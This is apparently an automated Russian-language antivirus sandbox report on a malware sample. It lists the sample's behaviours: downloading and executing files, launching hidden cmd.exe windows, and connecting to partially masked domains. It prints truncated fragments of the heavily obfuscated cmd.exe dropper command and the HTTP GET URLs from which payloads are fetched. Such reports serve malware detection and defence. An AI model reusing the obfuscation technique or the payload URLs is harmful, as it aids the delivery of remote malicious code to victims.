Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' ZFspqlzL BLbiBidWQwNLYFkATwFcCBi XTHCIku & %co^m^S^p^E^c% /c ^C^m^D;;; ; ^/v: ^ ;;;/^c " ;; ; (^s^e^t ^ o^C=Ci^w HZo F^wD uhr ^OJg f^r^l^ UD^1^ ^H^Wp^ l^t^Q ^M4Y ^e ^g aiR^ ^b0^U K^J1 XO^...
Сетевая активность
Подключается к
- 'si#####sheritage.com':80
- 'si#####sheritage.com':443
- 'cr#.#ectigo.com':80
- 'es####arinallc.com':80
- 'dr####tyle.com.ua':80
- 'dr####tyle.com.ua':443
TCP
Запросы HTTP GET
- http://si#####sheritage.com/career_system/backoffice/uploads/RIew5i
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
- http://www.es####arinallc.com/xLC1tT
- http://es####arinallc.com/xLC1tT
- http://www.dr####tyle.com.ua/e0
Другие
- 'si#####sheritage.com':443
- 'dr####tyle.com.ua':443
UDP
- DNS ASK si#####sheritage.com
- DNS ASK cr#.#ectigo.com
- DNS ASK es####arinallc.com
- DNS ASK ce#.org.my
- DNS ASK dr####tyle.com.ua
- DNS ASK si###v.net.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' ZFspqlzL BLbiBidWQwNLYFkATwFcCBi XTHCIku & %co^m^S^p^E^c% /c ^C^m^D;;; ; ^/v: ^ ;;;/^c " ;; ; (^s^e^t ^ o^C=Ci^w HZo F^wD uhr ^OJg f^r^l^ UD^1^ ^H^Wp^ l^t^Q ^M4Y ^e ^g aiR^ ^b0^U K^J1 XO^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ;;; ; /v: ;;;/c " ;; ; (^s^e^t ^ o^C=Ci^w HZo F^wD uhr ^OJg f^r^l^ UD^1^ ^H^Wp^ l^t^Q ^M4Y ^e ^g aiR^ ^b0^U K^J1 XO^E o^k^a^ ^w^a^W^ j^ci}adN}^h^8^6{5BThBEqciak^t1^Zoa^D^6^k^cvtT}k^X^U^;^yT...
